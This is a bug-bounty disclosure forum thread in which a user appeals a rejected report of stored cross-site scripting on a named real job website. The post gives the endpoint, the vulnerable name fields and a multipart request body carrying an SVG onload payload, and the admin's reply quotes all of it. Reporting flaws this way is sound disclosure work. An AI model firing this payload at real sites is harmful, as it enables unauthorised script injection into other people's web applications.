Rejected Submissions Issuse.

Your experience of helping website owners
Post Reply
Manojkhd
Posts:19
Joined:Thu Mar 19, 2020 3:48 pm
Rejected Submissions Issuse.

Post by Manojkhd » Sat Jul 10, 2021 2:18 pm

Hi, OBB team my reject ID: 2074677 the 👉Vulnearble XSS web: www.kumarijob.com and 👉POST /jobseeker/dashboard/update-profile HTTP/1.1 then 👉path referer: https://www.kumarijob.com/jobseeker/dashboard/personal 💥step by next step reduce login to the account so path : /jobseeker/dashboard 🧗goto to the ✍"Edit Profile" > Edit Basic Information the 🕵vulnearble parmaeter are: Fullname, Middel Name, Last Name is effect, Cross site scripting (XSS) the 👆post data download below let check out!👀
----------------------------------------------------------------------------------------------------------

-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="fname"

"><svg onload=prompt("xss")>
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="mname"

MN vuln Payload
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="lname"

LN Vuln Payload
i hope soon as posiable to my 💚"On Hold Vulnerabilities" thank you OBB 👍
Top
User avatar
x1admin
Site Admin
Posts:3110
Joined:Sun Nov 15, 2015 7:04 pm

Re: Rejected Submissions Issuse.

Post by x1admin » Tue Jul 13, 2021 7:15 am

Manojkhd wrote:
Sat Jul 10, 2021 2:18 pm
 Hi, OBB team my reject ID: 2074677 the 👉Vulnearble XSS web: www.kumarijob.com and 👉POST /jobseeker/dashboard/update-profile HTTP/1.1 then 👉path referer: https://www.kumarijob.com/jobseeker/dashboard/personal 💥step by next step reduce login to the account so path : /jobseeker/dashboard 🧗goto to the ✍"Edit Profile" > Edit Basic Information the 🕵vulnearble parmaeter are: Fullname, Middel Name, Last Name is effect, Cross site scripting (XSS) the 👆post data download below let check out!👀
----------------------------------------------------------------------------------------------------------

-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="fname"

"><svg onload=prompt("xss")>
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="mname"

MN vuln Payload
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="lname"

LN Vuln Payload
i hope soon as posiable to my 💚"On Hold Vulnerabilities" thank you OBB 👍
our contact form have report examples, please look
Top
Post Reply

Return to “Coordinated and Responsible Disclosure”

Who is online

Users browsing this forum: No registered users and 2 guests